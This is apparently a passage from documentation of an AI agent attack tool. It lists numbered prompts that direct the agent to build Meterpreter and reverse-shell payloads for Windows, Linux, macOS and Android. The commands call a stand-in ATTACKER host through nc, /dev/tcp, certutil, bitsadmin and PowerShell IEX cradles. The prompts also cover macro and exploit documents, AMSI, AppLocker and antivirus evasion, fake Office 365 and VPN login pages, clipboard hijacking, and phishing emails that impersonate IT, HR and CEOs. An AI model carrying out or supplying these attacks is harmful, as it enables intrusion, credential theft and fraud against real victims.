Prompt: Generate a Windows Meterpreter MSI installer payload (msfvenom -f msi) and set up the handler — victim triggers by double-clicking the .msi installer file

5. Windows Service EXE

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f exe-service + handler
Victim triggers: Installs it as a service via sc create — persists across reboots
Prompt: Generate a Windows Meterpreter service executable (msfvenom -f exe-service) and set up the handler — victim triggers by installing it as a Windows service via sc create

6. VBScript dropper (.vbs)

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f vbs + handler
Victim triggers: Double-clicks the .vbs file — no Microsoft Office required
Prompt: Generate a Windows Meterpreter VBScript payload (msfvenom -f vbs) and set up the handler — victim triggers by double-clicking the .vbs file (no Office required)

7. HTA-PSH standalone file

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f hta-psh + handler
Victim triggers: Double-clicks the .hta file — runs embedded PowerShell via mshta.exe
Prompt: Generate a Windows HTA file with embedded PowerShell payload (msfvenom -f hta-psh) and set up the handler — victim triggers by double-clicking the .hta file

8. Fileless PowerShell (psh-reflection)

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f psh-reflection + handler
Victim triggers: Pastes the PowerShell command into a terminal — payload runs entirely in memory
Prompt: Generate a fileless PowerShell (psh-reflection) Meterpreter payload and set up the handler — victim triggers by pasting the command into a PowerShell terminal

9. PowerShell Base64 one-liner

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp -f psh-cmd + handler
Victim triggers: Pastes powershell -e <base64> into cmd or PowerShell
Prompt: Generate a Windows Meterpreter payload as a PowerShell Base64 one-liner (msfvenom -f psh-cmd) and set up the handler — victim triggers by pasting the powershell -e command into cmd or PowerShell

10. SCR screensaver backdoor

What the agent does: msfvenom -f exe renamed to .scr + handler
Victim triggers: Double-clicks the .scr file — bypasses some email attachment filters that block .exe
Prompt: Generate a Windows Meterpreter EXE payload renamed to .scr (screensaver) and set up the handler — victim triggers by double-clicking the .scr file (bypasses some email filters)

11. Batch file dropper (.bat)

What the agent does: Writes a .bat using certutil to download + execute a Meterpreter payload
Victim triggers: Double-clicks the .bat file — certutil fetches and runs the payload silently
Prompt: Write a Windows batch file that uses certutil to download and execute a Meterpreter payload, and set up the handler — victim triggers by double-clicking the .bat file

12. Encrypted RC4 payload

What the agent does: msfvenom -p windows/meterpreter/reverse_tcp_rc4 + handler
Victim triggers: Runs the .exe — network traffic is RC4-encrypted, evading network inspection
Prompt: Generate a Windows Meterpreter reverse_tcp_rc4 encrypted payload for network evasion and set up the handler — victim triggers by running the .exe file

Linux

13. Meterpreter ELF binary (reverse_tcp)

What the agent does: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf + handler
Victim triggers: Runs chmod +x payload.elf && ./payload.elf
Prompt: Generate a Linux x64 Meterpreter ELF binary payload and set up the handler — victim triggers by running chmod +x payload.elf && ./payload.elf

14. Shell ELF binary (fallback)

What the agent does: msfvenom -p linux/x64/shell_reverse_tcp -f elf + handler
Victim triggers: Executes ./payload.elf — basic shell (no Meterpreter features)
Prompt: Generate a Linux x64 basic shell ELF binary (linux/x64/shell_reverse_tcp) and set up the handler — victim triggers by executing ./payload.elf

15. Shared object .so (LD_PRELOAD)

What the agent does: msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf-so + handler
Victim triggers: Any program loads it via LD_PRELOAD=./payload.so /usr/bin/id — hijacks any program
Prompt: Generate a Linux Meterpreter shared object (msfvenom -f elf-so) and set up the handler — victim triggers when any program loads the .so via LD_PRELOAD=./payload.so

16. Bash reverse shell one-liner

What the agent does: msfvenom -p cmd/unix/reverse_bash + handler
Victim triggers: Pastes the bash one-liner into a terminal
Prompt: Generate a bash reverse shell one-liner (cmd/unix/reverse_bash) and set up the handler — victim triggers by pasting the one-liner into a bash terminal

17. Bash /dev/tcp reverse shell

What the agent does: Generates /bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1 + handler
Victim triggers: Pastes into a bash terminal — uses only bash built-ins, no external tools
Prompt: Generate a bash /dev/tcp reverse shell one-liner and set up the handler — victim triggers by pasting /bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1 into a terminal

18. Python reverse shell one-liner

What the agent does: msfvenom -p cmd/unix/reverse_python + handler
Victim triggers: Pastes the python -c '...' command into a terminal
Prompt: Generate a Python reverse shell one-liner (cmd/unix/reverse_python) and set up the handler — victim triggers by pasting the python command into a terminal

19. Perl reverse shell one-liner

What the agent does: msfvenom -p cmd/unix/reverse_perl + handler
Victim triggers: Pastes the perl -e '...' command into a terminal
Prompt: Generate a Perl reverse shell one-liner (cmd/unix/reverse_perl) and set up the handler — victim triggers by pasting the perl command into a terminal

20. Netcat reverse shell

What the agent does: Generates nc -e /bin/sh ATTACKER 4444 + handler
Victim triggers: Runs the nc command — requires netcat-traditional (with -e flag)
Prompt: Generate a netcat reverse shell command and set up the handler — victim triggers by running nc -e /bin/sh ATTACKER 4444 in a terminal

21. Socat encrypted reverse shell

What the agent does: Generates a socat + OpenSSL command + matching listener
Victim triggers: Runs the socat command — connection is SSL-encrypted end-to-end
Prompt: Generate a socat reverse shell with OpenSSL encryption and set up the listener — victim triggers by running the socat command that connects back encrypted

22. OpenSSL encrypted reverse shell

What the agent does: Generates mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client + listener
Victim triggers: Pastes the command — encrypted shell using only OpenSSL (pre-installed on most Linux)
Prompt: Generate an OpenSSL reverse shell one-liner (mkfifo + openssl s_client) and set up the listener — victim triggers by pasting the command into a terminal

23. C compiled reverse shell

What the agent does: Writes C source → compiles with gcc in kali_shell → handler
Victim triggers: Runs the compiled binary ./payload — static binary, no runtime dependencies
Prompt: Write a C reverse shell, compile it with gcc in kali_shell, and set up the handler — victim triggers by running the compiled binary ./payload

24. Go compiled reverse shell

What the agent does: Writes Go source → compiles with go build in kali_shell → handler
Victim triggers: Runs the compiled binary ./payload — single portable binary
Prompt: Write a Go reverse shell, compile it with go build in kali_shell, and set up the handler — victim triggers by running the compiled binary ./payload

macOS

25. Meterpreter Mach-O binary (reverse_tcp)

What the agent does: msfvenom -p osx/x64/meterpreter/reverse_tcp -f macho + handler
Victim triggers: Runs chmod +x payload && ./payload in Terminal
Prompt: Generate a macOS Mach-O Meterpreter reverse_tcp payload and set up the handler — victim triggers by running chmod +x payload && ./payload in Terminal

26. Mach-O reverse_https (encrypted)

What the agent does: msfvenom -p osx/x64/meterpreter/reverse_https -f macho + handler
Victim triggers: Executes the binary — encrypted HTTPS callback bypasses firewall
Prompt: Generate a macOS Mach-O Meterpreter reverse_https payload for encrypted callback and set up the handler — victim triggers by executing the binary in Terminal

27. Python reverse shell (Gatekeeper bypass)

What the agent does: msfvenom -p cmd/unix/reverse_python + handler
Victim triggers: Pastes the python command into Terminal — bypasses Gatekeeper (no binary to quarantine)
Prompt: Generate a macOS Python reverse shell one-liner (cmd/unix/reverse_python) and set up the handler — victim triggers by pasting the python command into Terminal (bypasses Gatekeeper)

28. Bash reverse shell one-liner

What the agent does: msfvenom -p cmd/unix/reverse_bash + handler
Victim triggers: Pastes the command into Terminal
Prompt: Generate a macOS bash reverse shell one-liner (cmd/unix/reverse_bash) and set up the handler — victim triggers by pasting the command into Terminal

29. Perl reverse shell one-liner

What the agent does: msfvenom -p cmd/unix/reverse_perl + handler
Victim triggers: Pastes the perl command into Terminal — Perl ships with macOS
Prompt: Generate a Perl reverse shell one-liner for macOS and set up the handler — victim triggers by pasting the perl command into Terminal (Perl ships with macOS)

30. AppleScript dropper

What the agent does: Generates osascript -e 'do shell script "curl ... | bash"' + handler
Victim triggers: Pastes the osascript command into Terminal or runs a .scpt file
Prompt: Generate a macOS AppleScript one-liner (osascript -e) and set up the handler — victim triggers by pasting the osascript command into Terminal or running a .scpt file

Android

31. Meterpreter APK backdoor

What the agent does: msfvenom -p android/meterpreter/reverse_tcp R > payload.apk + handler
Victim triggers: Installs and opens the APK on their device
Prompt: Generate an Android APK backdoor with android/meterpreter/reverse_tcp and set up the handler — victim triggers by installing and opening the APK on their device

32. Trojanized APK (injected into legit app)

What the agent does: msfvenom -p android/meterpreter/reverse_tcp -x legit.apk R > trojan.apk + handler
Victim triggers: Installs what looks like a normal app — payload is embedded inside
Prompt: Generate an Android APK payload embedded into a legitimate APK (msfvenom -x) and set up the handler — victim triggers by installing the trojanized app

33. APK with reverse_https (encrypted)

What the agent does: msfvenom -p android/meterpreter/reverse_https + handler
Victim triggers: Installs and opens the APK — callback is encrypted HTTPS
Prompt: Generate an Android reverse_https APK payload for encrypted callback and set up the handler — victim triggers by installing and opening the APK

34. Staged APK (smaller download)

What the agent does: msfvenom -p android/meterpreter/reverse_tcp (staged) + handler
Victim triggers: Installs the smaller APK — it downloads the full Meterpreter stage on connect
Prompt: Generate a staged Android APK (android/meterpreter/reverse_tcp) and set up the handler — victim triggers by installing the smaller APK which then downloads the full payload

Cross-Platform

35. Python Meterpreter (cross-platform)

What the agent does: msfvenom -p python/meterpreter/reverse_tcp -f raw + handler
Victim triggers: Runs python payload.py on Windows, Linux, or macOS
Prompt: Generate a cross-platform Python Meterpreter payload (python/meterpreter/reverse_tcp) and set up the handler — victim triggers by running python payload.py on any OS

36. Python HTTPS Meterpreter (encrypted)

What the agent does: msfvenom -p python/meterpreter/reverse_https -f raw + handler
Victim triggers: Runs the .py script on any OS — encrypted HTTPS callback
Prompt: Generate a cross-platform Python reverse_https Meterpreter payload and set up the handler — victim triggers by running the .py script on any OS with Python

37. Java JAR backdoor

What the agent does: msfvenom -p java/meterpreter/reverse_tcp -f jar + handler
Victim triggers: Runs java -jar payload.jar on any OS with Java
Prompt: Generate a Java JAR Meterpreter payload (java/meterpreter/reverse_tcp -f jar) and set up the handler — victim triggers by running java -jar payload.jar on any OS with Java

38. Java WAR backdoor (Tomcat / JBoss)

What the agent does: msfvenom -p java/meterpreter/reverse_tcp -f war + handler
Victim triggers: Deploys the .war on a Tomcat/JBoss server — triggers when a request hits the endpoint
Prompt: Generate a Java WAR Meterpreter backdoor and set up the handler — victim triggers when the .war is deployed on a Tomcat/JBoss server and a request hits the endpoint

39. PHP Meterpreter (.php file)

What the agent does: msfvenom -p php/meterpreter_reverse_tcp -f raw + handler
Victim triggers: Uploads the .php file to a web server — triggers when accessed via browser
Prompt: Generate a PHP Meterpreter payload (php/meterpreter_reverse_tcp -f raw) and set up the handler — victim triggers when the .php file is accessed via the web server

40. JSP web shell (Java servers)

What the agent does: Generates a JSP reverse shell via execute_code + handler
Victim triggers: Deploys the .jsp on a Tomcat/Java app server — triggers when the URL is accessed
Prompt: Generate a JSP reverse shell payload via execute_code and set up the handler — victim triggers when the .jsp file is accessed on a Tomcat/Java app server

41. ASPX Meterpreter (IIS / .NET)

What the agent does: msfvenom -p windows/meterpreter_reverse_tcp -f aspx + handler
Victim triggers: Uploads the .aspx to an IIS/.NET web server — triggers when accessed
Prompt: Generate an ASPX Meterpreter payload (msfvenom -f aspx) and set up the handler — victim triggers when the .aspx file is accessed on an IIS/.NET web server

42. Perl reverse shell (cross-platform)

What the agent does: msfvenom -p cmd/unix/reverse_perl -f raw + handler
Victim triggers: Pastes the command into a terminal on any OS with Perl installed
Prompt: Generate a Perl reverse shell one-liner (cmd/unix/reverse_perl) and set up the handler — victim triggers by pasting the command into a terminal on any OS with Perl

2. Malicious Documents

Weaponized Office, PDF, RTF, or shortcut files generated via Metasploit fileformat modules. Output is saved to /root/.msf4/local/ and copied to /tmp/ by the agent.

43. Word macro document (VBA)

What the agent does: exploit/multi/fileformat/office_word_macro + handler
Victim triggers: Opens the .docm and clicks "Enable Macros"
Prompt: Create a malicious Word document with a VBA macro payload and set up the handler — victim triggers by opening the .docm file and clicking "Enable Macros"

44. Excel macro spreadsheet (VBA)

What the agent does: exploit/multi/fileformat/office_excel_macro + handler
Victim triggers: Opens the .xlsm and clicks "Enable Content"
Prompt: Create a weaponized Excel spreadsheet with a macro payload and set up the handler — victim triggers by opening the .xlsm file and clicking "Enable Content"

45. PDF exploit (Adobe Reader)

What the agent does: exploit/windows/fileformat/adobe_pdf_embedded_exe + handler
Victim triggers: Opens the .pdf in Adobe Reader
Prompt: Generate a trojanized PDF file with an embedded payload and set up the handler — victim triggers by opening the .pdf file in Adobe Reader

46. RTF exploit (CVE-2017-0199)

What the agent does: exploit/windows/fileformat/office_word_hta + handler
Victim triggers: Opens the .rtf — payload fires automatically (no macro prompt), fetches an HTA from attacker
Prompt: Create a malicious RTF document exploiting CVE-2017-0199 and set up the handler — victim triggers by opening the .rtf file which auto-fetches an HTA payload

47. LNK shortcut file

What the agent does: exploit/windows/fileformat/lnk_shortcut_ftype_append + handler
Victim triggers: Double-clicks the .lnk shortcut
Prompt: Generate a malicious Windows shortcut (LNK file) with a reverse shell payload and set up the handler — victim triggers by double-clicking the .lnk shortcut

48. DDE attack (macro-less Office)

What the agent does: Generates a .docx with DDE field code via execute_code + handler
Victim triggers: Opens the .docx and clicks "Yes" on the DDE update prompt — no macros required
Prompt: Create a Word document using DDE field code to execute a reverse shell and set up the handler — victim triggers by opening the .docx and clicking "Yes" on the DDE prompt (no macros needed)

3. Web Delivery (Fileless)

Host a payload on the attacker's web server and generate a one-liner the victim pastes into a terminal. The payload runs in memory — no file touches disk. Uses exploit/multi/script/web_delivery or exploit/windows/misc/hta_server.

Windows

49. PowerShell web delivery

What the agent does: web_delivery TARGET 2 (PSH) + handler
Victim triggers: Pastes the generated PowerShell one-liner into cmd or PowerShell
Prompt: Set up a PowerShell web delivery attack (exploit/multi/script/web_delivery TARGET 2) — victim triggers by pasting the generated PowerShell one-liner into cmd or PowerShell

50. Regsvr32 AppLocker bypass

What the agent does: web_delivery TARGET 3 + handler
Victim triggers: Runs the regsvr32 one-liner — bypasses AppLocker policy restrictions
Prompt: Set up a Regsvr32 web delivery attack (exploit/multi/script/web_delivery TARGET 3) — victim triggers by running the regsvr32 one-liner which bypasses AppLocker restrictions

51. pubprn script bypass

What the agent does: web_delivery TARGET 4 + handler
Victim triggers: Runs the pubprn.vbs one-liner — bypasses Windows script execution policies
Prompt: Set up a pubprn web delivery attack (exploit/multi/script/web_delivery TARGET 4) — victim triggers by running the pubprn.vbs one-liner which bypasses script execution policies

52. SyncAppvPublishing bypass

What the agent does: web_delivery TARGET 5 + handler
Victim triggers: Runs the one-liner — bypasses Windows App-V application restrictions
Prompt: Set up a SyncAppvPublishingServer web delivery (exploit/multi/script/web_delivery TARGET 5) — victim triggers by running the one-liner which bypasses Windows App-V restrictions

53. PSH Binary web delivery

What the agent does: web_delivery TARGET 6 + handler
Victim triggers: Pastes the PowerShell one-liner which downloads and runs a binary payload
Prompt: Set up a PSH Binary web delivery (exploit/multi/script/web_delivery TARGET 6) — victim triggers by pasting the PowerShell one-liner that downloads and executes a binary payload

54. HTA delivery server

What the agent does: exploit/windows/misc/hta_server on SRVPORT 8080 + handler
Victim triggers: Visits the HTA URL in their browser and clicks "Run"
Prompt: Create an HTA delivery server (exploit/windows/misc/hta_server) on port 8080 — victim triggers by visiting the HTA URL in their browser and clicking "Run"

Linux / macOS

55. Python web delivery (Linux)

What the agent does: web_delivery TARGET 0 + handler
Victim triggers: Linux victim pastes the generated python one-liner into a terminal
Prompt: Set up a Python web delivery attack (exploit/multi/script/web_delivery TARGET 0) — Linux victim triggers by pasting the generated python one-liner into a terminal

56. Python web delivery (macOS)

What the agent does: web_delivery TARGET 0 + handler
Victim triggers: macOS victim pastes the generated python one-liner into Terminal
Prompt: Set up a Python web delivery attack (exploit/multi/script/web_delivery TARGET 0) — macOS victim triggers by pasting the generated python one-liner into Terminal

Cross-Platform

57. Python web delivery (any OS)

What the agent does: web_delivery TARGET 0 + handler
Victim triggers: Pastes the python one-liner into a terminal on any OS with Python
Prompt: Set up a Python web delivery attack (exploit/multi/script/web_delivery TARGET 0) — victim triggers by pasting the python one-liner into a terminal on any OS with Python

58. PHP web delivery (web servers)

What the agent does: web_delivery TARGET 1 + handler
Victim triggers: Executes the PHP one-liner on a web server running PHP
Prompt: Set up a PHP web delivery attack (exploit/multi/script/web_delivery TARGET 1) — victim triggers when the PHP one-liner is executed on a compromised web server

59. HTA server + email link combo

What the agent does: hta_server on port 8080 + sends URL via phishing email (requires chisel tunnel)
Victim triggers: Clicks the email link → browser opens the HTA → victim clicks "Run"
Prompt: Set up an HTA delivery server on port 8080 (requires chisel tunnel) and send the URL via phishing email — victim triggers by clicking the email link and opening the HTA in their browser

4. LOLBin & Bypass Techniques

Windows "Living-off-the-Land Binaries" — one-liners that use legitimate Windows system tools to download and execute payloads. These bypass application whitelisting (AppLocker), script execution policies, and some AV solutions because they use trusted Microsoft-signed binaries.

60. MSHTA URL execution

What the agent does: Sets up HTA payload server + generates mshta http://... one-liner
Victim triggers: Runs mshta http://ATTACKER:8080/payload.hta in cmd — no file download
Prompt: Set up an HTA payload server and generate a mshta one-liner — victim triggers by running mshta http://ATTACKER:8080/payload.hta in cmd (no file download needed)

61. Certutil download cradle

What the agent does: Generates EXE + hosts it + crafts certutil one-liner
Victim triggers: Runs certutil -urlcache -split -f http://ATTACKER/payload.exe && payload.exe
Prompt: Generate a Meterpreter EXE, host it via web delivery, and craft a certutil one-liner — victim triggers by running certutil -urlcache -split -f http://ATTACKER/payload.exe && payload.exe

62. Bitsadmin download

What the agent does: Generates EXE + hosts it + crafts bitsadmin one-liner
Victim triggers: Runs bitsadmin /transfer job http://ATTACKER/payload.exe c:\payload.exe
Prompt: Generate a Meterpreter EXE, host it via web delivery, and craft a bitsadmin one-liner — victim triggers by running bitsadmin /transfer job http://ATTACKER/payload.exe c:\\payload.exe

63. PowerShell IEX cradle

What the agent does: Sets up web delivery server + generates IEX one-liner
Victim triggers: Runs IEX(New-Object Net.WebClient).DownloadString("http://...") in PowerShell
Prompt: Set up a web delivery server and generate a PowerShell IEX cradle — victim triggers by running IEX(New-Object Net.WebClient).DownloadString("http://ATTACKER/payload") in PowerShell

64. WMIC process create

What the agent does: Generates Base64 PowerShell payload
Victim triggers: Runs wmic process call create "powershell -e BASE64" in cmd
Prompt: Generate a Base64-encoded PowerShell payload — victim triggers by running wmic process call create "powershell -e BASE64_PAYLOAD" in cmd

65. Regsvr32 SCT scriptlet

What the agent does: Generates .sct COM scriptlet via execute_code + hosts it
Victim triggers: Runs regsvr32 /s /n /u /i:http://ATTACKER/payload.sct scrobj.dll — bypasses AppLocker
Prompt: Generate a COM scriptlet (.sct) file via execute_code and host it — victim triggers by running regsvr32 /s /n /u /i:http://ATTACKER/payload.sct scrobj.dll (bypasses AppLocker)

66. MSBuild inline task (.xml)

What the agent does: Generates XML file with embedded C# shellcode via execute_code
Victim triggers: Runs MSBuild.exe payload.xml — bypasses AppLocker (.xml is not a blocked extension)
Prompt: Generate an MSBuild inline task XML file with embedded C# Meterpreter shellcode via execute_code — victim triggers by running MSBuild.exe payload.xml (bypasses AppLocker)

67. Windows Script Host (.wsf)

What the agent does: Generates .wsf file wrapping JScript/VBScript payload
Victim triggers: Double-clicks the .wsf file — executes via trusted wscript.exe
Prompt: Generate a Windows Script Host file (.wsf) wrapping a payload via execute_code — victim triggers by double-clicking the .wsf file which runs via wscript.exe

5. Evasion & Encoding

Techniques to modify payload signatures and evade antivirus detection. Uses msfvenom encoders, packers, custom templates, and in-memory execution techniques.

Windows

68. Encoded EXE (shikata_ga_nai)

What the agent does: msfvenom -e x86/shikata_ga_nai -i 5 -f exe + handler
Victim triggers: Double-clicks the encoded .exe — polymorphic encoding changes the signature each generation
Prompt: Generate a Windows Meterpreter EXE encoded with shikata_ga_nai (5 iterations) for AV evasion and set up the handler — victim triggers by double-clicking the encoded .exe

69. Multi-encode chain (shikata + countdown)

What the agent does: Pipes payload through x86/shikata_ga_nai then x86/countdown
Victim triggers: Runs the multi-encoded .exe — two encoding layers make static analysis harder
Prompt: Generate a Windows Meterpreter EXE with chained encoding (shikata_ga_nai + countdown) and set up the handler — victim triggers by running the multi-encoded .exe

70. XOR encoded payload

What the agent does: msfvenom -e x86/xor -f exe + handler
Victim triggers: Runs the encoded .exe — XOR encoding avoids basic signature detection
Prompt: Generate a Windows Meterpreter EXE encoded with x86/xor for signature evasion and set up the handler — victim triggers by running the encoded .exe file

71. Alpha_mixed alphanumeric shellcode

What the agent does: msfvenom -e x86/alpha_mixed + handler
Victim triggers: Executes the shellcode — only uses alphanumeric characters (A-Za-z0-9), useful for restricted input exploits
Prompt: Generate a Windows Meterpreter payload encoded with x86/alpha_mixed and set up the handler — victim triggers by executing the alphanumeric shellcode (useful for restricted character set exploits)

72. Custom template EXE (-x inject)

What the agent does: msfvenom -x legit.exe -k to inject payload into a legitimate executable
Victim triggers: Runs what looks like a normal application — payload executes alongside the legitimate program
Prompt: Generate a Meterpreter payload injected into a legitimate EXE (msfvenom -x legit.exe -k) and set up the handler — victim triggers by running what looks like a normal application

73. UPX packed EXE

What the agent does: Generates EXE then runs upx --best payload.exe
Victim triggers: Runs the packed .exe — UPX compression changes the binary signature
Prompt: Generate a Windows Meterpreter EXE and pack it with UPX for signature evasion, then set up the handler — victim triggers by running the packed .exe file

74. AMSI bypass + PowerShell payload

What the agent does: Writes PowerShell script via execute_code that disables AMSI before loading shellcode
Victim triggers: Pastes the script into PowerShell — AMSI bypass prevents Windows Defender from scanning the in-memory payload
Prompt: Write a PowerShell script that bypasses AMSI before loading Meterpreter shellcode and set up the handler — victim triggers by pasting the script into a PowerShell terminal

75. HTTPS with custom SSL cert

What the agent does: msfvenom -p windows/meterpreter/reverse_https + handler with HandlerSSLCert
Victim triggers: Runs the payload — callback traffic looks like legitimate HTTPS with a custom certificate
Prompt: Generate a Meterpreter reverse_https payload with a custom SSL certificate and set up the handler — victim triggers by running the payload which connects back over trusted-looking HTTPS

Linux / macOS

76. Encoded ELF (x64/xor)

What the agent does: msfvenom -e x64/xor -f elf + handler
Victim triggers: Runs chmod +x && ./payload.elf
Prompt: Generate a Linux ELF payload encoded with x64/xor for AV evasion and set up the handler — victim triggers by running chmod +x && ./payload.elf

77. Encoded Mach-O (x64/xor)

What the agent does: msfvenom -e x64/xor -f macho + handler
Victim triggers: Executes the encoded binary in Terminal
Prompt: Generate a macOS Mach-O Meterpreter payload encoded with x64/xor and set up the handler — victim triggers by executing the encoded binary in Terminal

Android

78. Encoded APK (shikata_ga_nai)

What the agent does: msfvenom -e x86/shikata_ga_nai + APK generation + handler
Victim triggers: Installs and opens the encoded APK
Prompt: Generate an Android APK payload encoded with x86/shikata_ga_nai for AV evasion and set up the handler — victim triggers by installing and opening the encoded APK

Advanced

79. Staged dropper + web delivery

What the agent does: Writes a small Python/bash dropper via execute_code that fetches the real payload from web delivery
Victim triggers: Runs the dropper script → it downloads and executes the second-stage Meterpreter payload
Prompt: Write a small Python/bash dropper script that fetches the real Meterpreter payload from the web delivery server — victim triggers by running the dropper which downloads and executes the second-stage payload

6. Credential Harvesting

Fake login pages and social engineering pages served via Python HTTP server on port 8080 inside the kali-sandbox container. Requires chisel tunnel (which forwards both port 4444 for reverse shells and port 8080 for web serving). Does not work with ngrok (only port 4444 is tunneled).

80. Fake login page (generic)

What the agent does: Writes + serves a fake HTML login form on port 8080 via execute_code that captures POSTed credentials
Victim triggers: Visits the URL and submits their username/password
Prompt: Write and serve a fake HTML login page on port 8080 via execute_code that captures credentials — victim triggers by visiting the URL and submitting their username/password

81. Fake Office 365 login

What the agent does: Writes + serves a Microsoft Office 365 lookalike login page on port 8080
Victim triggers: Visits the URL and enters their Microsoft credentials
Prompt: Write and serve a fake Microsoft Office 365 login page on port 8080 via execute_code — victim triggers by visiting the URL and entering their Microsoft credentials

82. Fake VPN portal login

What the agent does: Writes + serves a Cisco/Fortinet VPN portal lookalike on port 8080
Victim triggers: Visits the URL and enters their VPN credentials
Prompt: Write and serve a fake Cisco/Fortinet VPN portal login page on port 8080 via execute_code — victim triggers by visiting the URL and entering their VPN credentials

83. Fake software update page

What the agent does: Writes + serves a "Critical Update Required" page with a download button on port 8080
Victim triggers: Clicks "Download Update" which delivers a Meterpreter payload
Prompt: Write and serve a fake "Critical Update Required" page on port 8080 via execute_code — victim triggers by clicking the download button which delivers a Meterpreter payload

84. Fake file download page

What the agent does: Writes + serves a "Shared Document" page with a download link on port 8080
Victim triggers: Clicks the download link which delivers a payload file
Prompt: Write and serve a fake "Shared Document" download page on port 8080 via execute_code — victim triggers by clicking the download link which delivers a payload

85. Clipboard hijack (pastejacking)

What the agent does: Writes + serves an HTML page with JavaScript that silently replaces clipboard content on port 8080
Victim triggers: Copies text from the page, then pastes into their terminal — the clipboard contains a hidden reverse shell command
Prompt: Write and serve an HTML page on port 8080 with JavaScript clipboard hijacking — victim triggers when they copy text from the page and paste a hidden reverse shell command into their terminal

7. Email Campaigns

Phishing emails sent via Python smtplib through the SMTP server configured in project settings (PHISHING_SMTP_CONFIG). The agent writes and executes a Python email script inside the kali-sandbox container. Each suggestion uses a different social engineering pretext.

Payload Delivery

86. Send payload via phishing email

What the agent does: Generates a Meterpreter payload + sends it as an email attachment with an IT support pretext
Victim triggers: Opens the email attachment and runs the payload
Prompt: Generate a Meterpreter payload and send it via phishing email with an IT support pretext — victim triggers by opening the email attachment and running the payload

87. Send malicious document via email

What the agent does: Generates a malicious Office document + sends it disguised as an invoice
Victim triggers: Opens the attachment and enables macros
Prompt: Generate a malicious Office document and send it via email as an invoice — victim triggers by opening the attachment and enabling macros

88. Software update + payload attachment

What the agent does: Generates a Meterpreter payload + emails it as a critical security update from IT
Victim triggers: Downloads and runs the "update" attachment
Prompt: Generate a Meterpreter payload and email it as a critical security update from IT — victim triggers by downloading and running the "update" attachment

89. Meeting invite + malicious attachment

What the agent does: Sends a meeting invite email with a malicious Word macro document attached
Victim triggers: Opens the .docm attachment and enables macros
Prompt: Send a phishing email with a meeting invite and a malicious Word macro attachment — victim triggers by opening the .docm attachment and enabling macros

Credential Phishing

90. Password expiry phish

What the agent does: Sends email warning "your password expires in 24 hours" with a link to the credential harvesting page
Victim triggers: Clicks the "reset password" link and enters their credentials
Prompt: Send a phishing email warning the password expires in 24h with a link to the credential harvesting page — victim triggers by clicking the reset link and entering their credentials

91. IT security alert phish

What the agent does: Sends email about "unusual login from Russia" with a verification link
Victim triggers: Clicks "Verify Identity" and enters credentials on the fake page
Prompt: Send a phishing email about an unusual foreign login with a verification link — victim triggers by clicking the link and entering their credentials on the fake page

92. MFA reset phish

What the agent does: Sends email claiming "your MFA device was removed" with a re-enrollment link
Victim triggers: Clicks "Re-enroll MFA" and enters credentials on the fake page
Prompt: Send a phishing email claiming their MFA device was removed with a re-enroll link — victim triggers by clicking the link and entering their credentials on the fake page

93. Cloud storage share phish

What the agent does: Sends email mimicking a OneDrive/Dropbox "someone shared a file with you" notification
Victim triggers: Clicks "View Document" and enters credentials on the fake login page
Prompt: Send a phishing email mimicking a OneDrive/Dropbox sharing notification — victim triggers by clicking the "View Document" link and entering credentials on the fake login page

Social Engineering Pretexts

94. Invoice attachment pretext

What the agent does: Sends email from "accounting" with a fake invoice (malicious .xlsm)
Victim triggers: Opens the Excel attachment and clicks "Enable Content"
Prompt: Send a phishing email with a fake invoice (malicious Excel macro) from accounting — victim triggers by opening the .xlsm attachment and clicking "Enable Content"

95. Shared document notification

What the agent does: Sends email mimicking "John shared a document with you" with a web delivery link
Victim triggers: Clicks the link and pastes the web delivery one-liner
Prompt: Send a phishing email mimicking a "John shared a document with you" notification — victim triggers by clicking the link and pasting the web delivery one-liner

96. HR policy update pretext

What the agent does: Sends email from "HR" about a new remote work policy with a malicious Word document
Victim triggers: Opens the .docm attachment and enables macros
Prompt: Send a phishing email from HR about a new remote work policy with a malicious Word document — victim triggers by opening the .docm attachment and enabling macros

97. Delivery notification pretext

What the agent does: Sends email mimicking a package delivery notification with a tracking link
Victim triggers: Clicks the tracking link which points to the payload download URL
Prompt: Send a phishing email mimicking a package delivery notification — victim triggers by clicking the tracking link which points to the payload download or web delivery URL

98. Payment confirmation pretext

What the agent does: Sends email about "a payment of $499" with a malicious receipt attachment
Victim triggers: Opens the attachment to "review the transaction details"
Prompt: Send a phishing email about a $499 payment with a malicious receipt attachment — victim triggers by opening the attachment to "review the transaction"

99. Job application response

What the agent does: Sends email claiming "We'd like to schedule an interview" with a malicious attachment
Victim triggers: Opens the .docm to see the interview details
Prompt: Send a phishing email claiming "We would like to schedule an interview" with a malicious attachment — victim triggers by opening the .docm to see the interview details

100. Executive impersonation (CEO fraud)

What the agent does: Sends email impersonating the CEO/CTO with an urgent request and a malicious attachment
Victim triggers: Opens the "confidential" attachment
Prompt: Send a phishing email impersonating the CEO/CTO with an urgent request and attachment — victim triggers by opening the "confidential" malicious attachment

101. Tax document phish

What the agent does: Sends email claiming "your W-2/tax form is ready" with a malicious PDF
Victim triggers: Opens the PDF in Adobe Reader
Prompt: Send a phishing email claiming a W-2/tax form is ready with a malicious PDF attachment — victim triggers by opening the PDF in Adobe Reader

102. Voicemail notification pretext

What the agent does: Sends email about "a new voicemail" with a malicious attachment
Victim triggers: Opens what appears to be an audio player — actually runs the payload
Prompt: Send a phishing email about a new voicemail with a malicious attachment — victim triggers by opening what appears to be an audio player but runs the payload

103. Helpdesk ticket update

What the agent does: Sends email about "ticket #12345 resolved — see details" with a link
Victim triggers: Clicks "View Details" which points to the web delivery URL
Prompt: Send a phishing email about a resolved helpdesk ticket with a "view details" link — victim triggers by clicking the link which points to the web delivery URL

104. Newsletter with trojan link

What the agent does: Sends email formatted as a company newsletter with one poisoned link
Victim triggers: Clicks a link that points to the payload download or web delivery URL
Prompt: Send a phishing email formatted as a company newsletter — victim triggers by clicking one of the links which points to the payload download or web delivery URL

8. Persistence & Bind Shells

Post-access persistence mechanisms that survive reboots/logouts, and bind shell payloads that don't require a tunnel (the victim opens a listening port and the attacker connects to them).

Persistence Mechanisms
